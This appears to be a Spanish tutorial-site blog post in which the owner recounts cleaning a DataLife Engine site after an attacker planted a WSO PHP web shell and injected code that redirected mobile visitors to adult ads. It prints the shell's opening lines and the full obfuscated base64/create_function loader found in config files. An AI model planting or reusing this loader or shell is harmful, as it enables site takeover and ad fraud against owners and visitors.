Cerrar menu
Tutoriales En Linea
  • Tutoriales
    • Aprendizaje
    • Video Tutorial
    • Manuales
    • Hagalo usted mismo
    • Explorar todo
  • Adobe
    • After Effects
    • Dreamweaver
    • Premiere Pro CC
    • Photoshop
    • Photoshop Mix
    • Lightroom
    • Illustrator
    • Adobe Muse
    • Creative Cloud
  • Android
    • Developer Android
    • Aplicaciones
    • Android Studio
    • Android Wear
    • Desarrolladores
    • SDK Platform-Tools
    • ADB...depuración Bridge
    • Fastboot
    • Root
    • Recovery
  • Apple
    • iPhone y iPad
    • iPhone
    • iPad
    • Mac OS
    • iCloud
    • iTunes
  • Cursos
    • Actívate
    • Autoempleo
    • Idiomas
    • Curso De HTML
    • Curso de C++
    • Javascript
    • jQuery
    • Matematicas
    • Programacion
    • Python
    • Udacity
    • Diseño Web adaptativo
  • Ciberseguridad
    • Malware
    • Ransomware
    • Virus
    • Troyano
    • Dorkbot
    • Filecoders
    • keylogger
    • Spyware
    • Jackware
    • DDoS
    • HackerOne
    • Interpol
  • Criptomonedas
    • Blockchain
    • Mineria de Criptomonedas
    • Bitcoin (BTC)
    • Bitcoin Cash (BCH)
    • DASH (Dash)
    • Dogecoin (Doge)
    • Ethereum (ETH)
    • Litecoin (LTC)
    • Monero (XMR)
    • Ripple (XRP)
    • Zcash (ZEC)
    • Forex
    • Trading
  • Desarrollo Web
    • Sistema de gestion de contenidos
    • AMP
    • Datalife Engine
    • Blogger
    • WordPress
    • Joomla
    • Bootstrap
    • Plantillas
    • @font-face
    • Schema
    • Website
    • Desarrolladores
    • Lenguaje Web
  • Diseño Web
    • Web Responsive
    • Lenguaje Web
    • Datos estructurados
    • HTML
    • CSS3
    • JavaScript
    • Ajax
    • jQuery
    • PHP
  • Entretenimiento
  • Encuestas
    • GlobalTestMarket
    • Centro de opinion
    • Ipsos i-Say
    • Triaba
    • opinea
    • Toluna
    • YouGov
    • ClixSense
    • ySense
    • Cint
    • Beruby
  • Electricidad
  • Electronica
  • Ganar dinero comprando
    • CashbackDeals
    • Cashback
    • Por ir de compras
    • Aklamio
    • Intercambio de tráfico
    • Justificante de pagos
    • Webs estafas
  • Google
    • Google Pay
    • Adsense
    • Gmail
    • Google Apps
    • Google Chrome
    • Google Cloud Platform
    • Google Consumer Surveys
    • Google Desarrolladores
    • Google Fit
    • Google Maps
    • Google Photos
    • Google Play
    • Google Translation
    • DoubleClick
    • YouTube
    • Chromebooks
  • Marketing
    • SEM
    • SEO
    • Posicionamiento
    • Contenido
    • Publisuites
    • Space Content
    • Coobis
    • Marketing
  • Computadora u ordenador
    • Sistemas operativos
      • Windows
      • Mac OS
      • Android
      • Linux
      • Ubuntu
      • Kali Linux
      • Wifislax
    • hardware
    • Software
    • BIOS
    • Unidad de disco duro
    • Programacion
    • Dispositivos
    • Internet
  • Ofimática
    • Microsoft
    • Suite Ofimatica
    • Access
    • Word
    • Excel
    • Powerpoint
    • Outlook
    • Microsoft Publisher
  • PTC
    • No pierdas tiempo con estas web
  • Redes Sociales
    • Delicious
    • Facebook
    • Instagram
    • linkedin
    • Snapchat
    • TikTok
    • Twitter
    • Pinterest
    • Spotify
    • Vkontakte - VK
    • WhatsApp
  • Smartphone
    • Telefonos
    • Telefonia movil y telecomunicaciones
    • Desbloquear
    • Códigos NCK
    • Liberar
    • Tarjeta SIM
    • Tablet
  • Sitio Web
    • Dominios
    • Hosting
    • Servidores
    • Demo DLE
    • Documentación sobre Datalife Engine
    • Modulos DLE
    • Hack
    • Optimizacion
    • Google Adsense
    • Plantillas
  • Tips
    • Cabello
    • Consejos
    • Cremas
    • Cosmético
    • Cuerpo
    • Dieta
    • Exfoliantes
    • Entrenamiento
    • Ejercicio
    • Estilo
    • Fitness
    • Habitos
    • Hidratante
    • Look
    • Maquillaje
    • Moda
    • Piel Radiante
    • Recetas
    • Ropa
    • Rutina
    • Salud
    • Tratamientos
  • Trabajos
    • Atencion al cliente
    • Asistente virtual
    • Transcripcíon
    • Transcripcíones medica
    • Entrada de datos
    • De edicion y correccion
    • Mystery Shopping
    • Micro trabajos
    • Contabilidad
    • Tutoria y aprendizaje
    • Mas ingresos extras
    • Git
    • GitHub
    • Criptografia
    • Deep Web
    • Hacker
    • FTP
    • Indexar
    • Newsletter
    • Redes y VPN
    • Herramientas online
  • Windows
    • Skype
    • Windows
    • Windows 11
    • Windows 10
    • Windows 8
    • Windows 7
    • Puerta trasera de Windows
    • Microsoft Edge
Facebook X (Twitter) Instagram
  • Sobre nosotros
  • Últimos artículos
  • Herramientas SEO
  • Ver mas temas
  • Más sitios que te gustarán
Facebook X (Twitter) Instagram Pinterest Youtube
  • Secciones
    1. Android
    2. Adobe
    3. Bricolaje
    4. Bachillerato
    5. Cursos
    6. Criptomonedas
    7. Criptografia
    1. Diseño Web
    2. Encuestas
    3. Empleo
    4. Electricidad
    5. Electronica
    6. Forex
    7. Fisica
    1. Google
    2. Hardware
    3. Herramientas Ofimaticas
    4. Herramientas
    5. Internet
    6. Idiomas
    7. IPTV
    1. Programacion
    2. Libros
    3. Microsoft
    4. Manuales
    5. Matematica
    6. Newsletter
    7. Optimizacion
    1. Redes Sociales
    2. Software
    3. Seguridad
    4. Telefonia
    5. WebSite
    6. Ver todas las categorias
    7. Post promocionado
  • Smartphone

    Comprendre les Différences entre les Chargeurs USB et les Chargeurs USB-C : Un Guide Complet

    Huawei Smartphones: Las Mejores Ofertas del Black Friday para Aprovechar

    Gadgets imprescindibles para tu configuración de oficina en casa

    ¡Descubre las tendencias más emocionantes en el mundo de los videojuegos!

    Tendencias en sistemas operativos en smartphone

  • Tecnología
    1. Móviles
    2. Ordenadores
    3. Software
    4. Hardware
    5. Seguridad
    6. Ver todo

    Comprendre les Différences entre les Chargeurs USB et les Chargeurs USB-C : Un Guide Complet

    Huawei Smartphones: Las Mejores Ofertas del Black Friday para Aprovechar

    Gadgets imprescindibles para tu configuración de oficina en casa

    ¡Descubre las tendencias más emocionantes en el mundo de los videojuegos!

    Cómo limpiar la unidad C de archivos innecesarios

    Descubre el misterioso mundo del hash de archivos: ¡todo lo que necesitas saber!

    Los componentes fundamentales que todo PC debería tener

    Que es la tecla TAB

    Cifrado | Seguridad Local

    Maximiza tu productividad: Descubre el sistema interactivo que revolucionará la gestión de proyectos en tu empresa

    Cómo limpiar la unidad C de archivos innecesarios

    Como jugar online y resolver un sudoku

    Que es la tecla TAB

    Cómo deshabilitar la desfragmentación de SSD y HDD en Windows 10 y 11

    Benefits Of Vertical Dual Monitors For Coding And Programming

    AMD ha identificado la causa de la quema de los procesadores Ryzen 7000 y ha lanzado un nuevo AGESA para corregir el problema

    Cifrado | Seguridad Local

    Descubre el misterioso mundo del hash de archivos: ¡todo lo que necesitas saber!

    Virus en el sistema DataLife Engine (DLE) y cómo tratarlos

    La ciberseguridad: Vital Para Las Apuestas Online en España

    ¡Descubre las tendencias más emocionantes en el mundo de los videojuegos!

    ¿Aburrido de tu viejo televisor? Descubre las últimas tendencias en televisores

    Generador de Video IA: La Revolución en la Creación Audiovisual

    Los últimos celulares para que estés a la última

  • Estilo de vida
    1. Entrenamiento
    2. Maquillaje
    3. Dieta
    4. Moda
    5. Trucos y tips
    6. Ver todo

    Desarrolla un cuerpo fuerte y saludable

    ¿Qué es la forma física?

    Mejora los resultados de tu entrenamiento de estabilidad y fuerza

    Consejos para maximizar las caminatas diarias

    ¿Por qué es importante preparar la piel antes de maquillarla?

    Consejos para aplicar pestañas postizas

    Consejos para una piel perfecta este invierno

    La nutrición y un cabello saludable

    Cosas que le pasan a tu cuerpo cuando comes salmón todos los días

    Batidos de proteínas pueden ayudar a mejorar sus hábitos alimenticios

    Batidos de proteinas - Una guía para principiantes

    Snacks nutritivos para cada antojo

    Inspiración de traje de otoño

    La dura verdad sobre las modelos de talla grande

    Razones por las que las marcas de moda de lujo son tan caras

    Cuales son las mejores frutas para adelgazar

    Como enseñar a leer y a escribir

    Como generar cuentas Disneyplus

    Calcular porcentajes con la Calculadora de Windows 10

    Bricolaje para la decoración del hogar

    Bricolaje para la decoración del hogar

    Top 10 de posturas de yoga

    ¿Por qué es importante preparar la piel antes de maquillarla?

    Consejos de belleza para lucir fresca en el verano

  • Marketing

    ¿Sirven de algo los diseñadores Web?… ¿y los redactores de contenido?

    ¿Qué es un Link Dofollow?

    ¿Qué es Nofollow?

    ¿Qué es el remarketing?

    ¿Qué es el posicionamiento web (SEO) y lo necesito para mi sitio web?

  • Juegos

    Para qué se pueden usar las Gafas VR PS4

    La nueva generación de realidad virtual de PlayStation®VR2 y PlayStation®5

    Colaboración entre Sony INZONE y EXCEL Esports

    Sony prohíbe cuatro juegos de terceros en Xbox

    Prepárate para el futuro: Project Trinity llega a finales de 2024

  • Herramientas
Búsqueda extendida

Escriba arriba y presione Enter para buscar.

¡Bienvenido de nuevo!

Inicie sesión o Regístrate ahora

VK

o con Email

¿Has olvidado tu contraseña?

Noticias » Ataques a sitios web con fraude publicitario - best-winnerspace1.life

Ataques a sitios web con fraude publicitario - best-winnerspace1.life


0 Marzo 16, 2022
Compartir

Compartir
Twitter Pinterest LinkedIn Tumblr WhatsApp Email
Recientemente este sitio fue atacado por algún desocupado el cual creo una puerta trasera (Backdoor:PHP/WebShell) en tutorialesenline.es en unos de sus directorios.

Ataques a sitios web con fraude publicitario - best-winnerspace1.life
Una vez que tuvo con esta puerta trasera pudo infectar algunos de los archivos de php de mi cms de datalife engine, con un código ofuscado del php.

Los antecedentes de la infeccion


Cada vez que un o una nueva dirección IP entraba a la versión móvil de tutorialesenlinea.mejorapp.org lo redireccionaba a: 
best-winnerspace1.life/?u=utt8wwl&o=67zmqf5&t=en_mac.txt&cid=41-297-20210223015523b67eb1f15
La cual era publicidad para adultos, en pocas palabras una porquería de publicidad y así llevaba varias semanas, pensé al principio que era alguna apk que estaba inyectándola, hasta que me propuse averiguar que era, después de haber limpiado y reseteado mi móvil seguía ese redireccionamiento maligno. 

Una vez que me di cuenta que no era mi móvil si no el dominio en si, escanee todos los directorios y archivos del dominio hasta que dio positivo en un archivo que tenia una puerta trasera, después de ello había ofuscado algunos de los archivos y así hacia los redireccionamiento a esa publicidad engañosa. 


EL archivo en cuestión era wso.txt cuando hice una pequeña busqueda me di cuenta que era un #PHP webshell / de archivos Nuevo Web Shell WSO su código fuente estaba en github, a continuación les mostrare un ejemplo del código:
<?php
/* WSO 2.2.0 (Web Shell by HARD _LINUX) ESTAS LINEAS HABIA SIDO MODIFICADAS POR EL CABRON */
$auth_ = "21232f297a57a5a743894a0e4a801fc3"; //
$color = "#fff";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP__AGENT'],'Google') !== false ) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.2.0');...............y aun continua...
Esa herramienta esta solo para fines de prueba y solo se puede usar cuando se haya otorgado un consentimiento expreso. No lo use para fines ilegales. ESO ES LO QUE DICEN LOS CREADORES DE ESTE CODIGO. Ver código en github

Ahora nos toca la ofuscación del código php de los archivos php.

Como ofuscar Codigo PHP


La ofuscación de código es una técnica que permite ocultar el código para que no sea descifrado o sea difícil de descifrar, y así evitar que se conozcan y/o modifiquen los algoritmos las url y demás codigos.

Para lograr esto por lo general suele usar estas funciones base64_encode, base64_decode y eval.

  • base64_encode(texto) toma como parámetro una cadena de texto y la convierte en codificación base64.
  • base64_decode(texto) toma como parámetro una cadena de texto codificada en base64 y la convierte en texto normal.
  • eval(texto) toma como parámetro una cadena de texto y la ejecuta como código PHP.
En mi caso habían utilizado el segundo de los anteriores expuesto, ejemplo del código:
 $dle_lic = "@Ev"."AL(gZu"."nCOmp"."rEss(bAS"."e64"."_Dec"."odE('eF6VVW1v2zYQ/isOYIQS7Mgvkm0pntashbEFG9otTVYMrSFQ0lniLIkKScU1yvz3HqUEiQvPwD7ojuS933Ok+rGAkESk55CokYaBaDeGsJQs2cayvMCfDTzPn9g/m2VP657kyRZUlBRcgtUXG9teQiHhWynlfRHdNyD25njYF/BMMJK9fER/TEpQVj969+HD79erz0awtu1vV3iacL5l6BhocKg8lQsRIse+DPgtliSEak82ZdHSqGIQmm3mLs+hNic/Gf4oV/WhycFPtjciRlMveC6djzZ3M3mHlI/MAdz3xv7vlu4JEjFZjWhBjk4+rm79XNZ6mEgAcLmeJNXYOwCBNNpCQ09wiMba+X/UawVxbkZvXX3erjbXR3c03Wy6t+zmV4yp+SPI9qpfLWWwsvZjnwXM9HeHFp4KVC0H2EpiBafFsQOwyHJsIz3KykGSQCqIKN4GWG7jrUNwgO0tOlCUDHIF6yyYGmKHhSJe4bliVOXSozjJcjUyq20CedIeJYljeCa4YRfurj0dXdath7lxVn7ZK2BvwPYiM7l8DbKcfeIxN014gCqoSn3SwblZoKWoICEX7pb2G/4yJFM9xIOG9EOEG7IxWFr0s6x5p+8E5yperLkSnDtBEpqptmfmVquctZAZbrB/6FITY6fqCFZQAfPhGZmb4iO91YVUFGET7ZHCDtBq73U6kiQavUmkz8+XC68FzbrgVkqF0XNMEGGHiX/x87y5tPFheGDNzFYnFhiP0GTaqkrNvrYV8+x8YrNBkaVbsdwLOXaf7t9vbP6A530S+/rt7fkrW5hCfEeCHbe3rW1lBSleQWGcWUpY1OsO8a21+A/uS+i/SqUPS60p8yUBqzgK+a0YiKJNc051yzrKT6LVe6ZjiEmpYxGv5D3wq+05xnuIlRWFJWOCNGOjDwDcACDmK3np1OT2i+dUSjH7ZOwjsnjk6bZGs+LXnGGy1zqDBwRR9MUF44SRda6B1TOH+aVVLRDLOqzK4rrVFNDEideN/lzdOKb3VT8ExvEMWYO1pCW9veFIf5yAo9y5JNtYgTR8esyro6zONtqjgso3ZiLFxiRLkvYy51lQrOUl2ytNYgGMgvvflY5yqJNI9xW/0xI06jJaoVbFdJ3zCl5aZYA/++HtJ2kB+N/BOcJ/zfq4ztP/oRUdpBjSNK1gJzXeuoxJ051wA5DGFJsbFqa7SiNjlVPntaZp+XqFBoIqxqsuQ8G6EGbVOwt75nU+8sA//RwWx97yx8fH701Gaes=')));";$lic_true = "cre"."ate_"."function";@$dle_conf = $lic_true('', "$dle_lic;");$dle_conf('');                                     
El anterior código estaba escrito en la parte superior del archivo de engine/data/config.php. o /engine/data/dbconfig.php, /engine/inc/options.php, /engine/classes/mysql.php

Ataques a sitios web con fraude publicitario - best-winnerspace1.life
En la anterior imagen se muestra algunos de los archivos modificados por estos desocupados. Despues de limpiar el codigo ofuscado y de eliminar la puerta trasera el sitio web se muestra con normalidad y sin publicidad para adultos. Acontinuacion les dejare una captura de pantalla de esa mierda de publicidad (A saber que esta era la que mas salía pero son muchas en si ).



 Y en conclusión hay que tener mas cuidado con las actualizaciones de seguridad de los cms(sistema de gestión de contenido), módulos,  complementos y demás.
Síguenos en
Google News Flipboard
  • 100
  • 1
  • 2
  • 3
  • 4
  • 5
Qué es y cómo funciona la fibra óptica
Máquinas de control numérico CNC
  • Website
  • Facebook
  • Twitter
  • LinkedIn
  • Pinterest
  • Instagram

Sobre mi: Mi nombre es Alexander y soy el fundador y CEO de este sitio. Me gusta considerarme un Geek entusiasta de la informática y la tecnología. Esta pasión me llevó a crear este sitio con el fin de compartir conocimientos en línea a través de cursos, tutoriales y videotutoriales. Estoy muy agradecido por el trabajo realizado hasta el momento y me siento muy entusiasmado con toda la información que he descubierto y compartido con otros. Estoy comprometido a seguir compartiendo mi conocimiento con la mayor de las dedicaciones. Leer mas...
Tutoriales en línea

Artículos Relacionados


Como jugar online y resolver un sudoku

Como jugar online y resolver un sudoku

Cómo fusionar dos imágenes distintas

Cómo fusionar dos imágenes distintas

Como usar el Multímetro y manual en PDF

Como usar el Multímetro y manual en PDF


Comentarios



Información
s que no esten registrados no pueden dejar comentarios, te invitamos a que te registre!

Destacados

Lista IPTV con canales para colombia

Mayo 23 44 643

Como instalar SS IPTV en una Smart Tv Samsung

Ene 22 10 421

Como podemos conseguir proxies

Jun 21 11 646

Historia de los sistemas operativos

Mayo 16 31 109

Lo mas leidos

Herramientas SEO para posicionamiento de nuestra web 2024

Por 17-06-24

Herramienta online de generador de datos estructurados

Por Tutoriales En Linea 17-06-24

Las 7 mejores páginas para descargar películas en .torrent en español

Por 26-09-24

Etiquetas

ciberseguridad




Sobre nosotros

Tutoriales En Linea

¡Bienvenidos a Tutoriales En Línea, el sitio web perfecto para encontrar todas las herramientas necesarias para mejorar tus habilidades de forma gratuita! En Tutoriales En Linea se encuentran tutoriales, cursos online y aprendizaje de calidad, muy útiles para desarrollar tus capacidades... Leer mas...

Tiene una pregunta? ar...

Enlaces

  • Sobre nosotros
  • Ultimos tutoriales
  • Publicar tutorial
  • Ver mas temas
  • Ultimos comentarios
  • ¿Preguntas Frecuentes?
  • Derechos de autor
  • Politica de cookies
  • Nuestro equipo
  • Normas

Herramientas online

  • Buscador de recetas
  • Prueba de diseño web
  • Codificar en binarios, hexadecimales...
  • Cual es mi IP
  • Test de velocidad
  • Editor HTML
  • Test de escritura
  • Test de nutricion
  • Descargar Videos
  • Generador de datos estructurados

Recursos

  • Analisis de tus problemas de SEO
  • Herramientas SEO
  • Generar palabras claves
  • Referencia de CSS3
  • Convertir HTML a XML
  • Acortador de URL
  • Selector de colores
  • Contador de palabras
  • Comprimir imagenes
  • Conversor a URI de datos
  • Suscribirse
Facebook Twitter Instagram Pinterest Linkedin Youtube
  • Anunciarse
  • Socios externos
  • Política de privacidad
  • Términos y Condiciones
  • Sobre nosotros
  • ar
© Tutoriales En Linea. Reservados todos los derechos, queda prohibida la reproducción parcial o total sin previa autorización.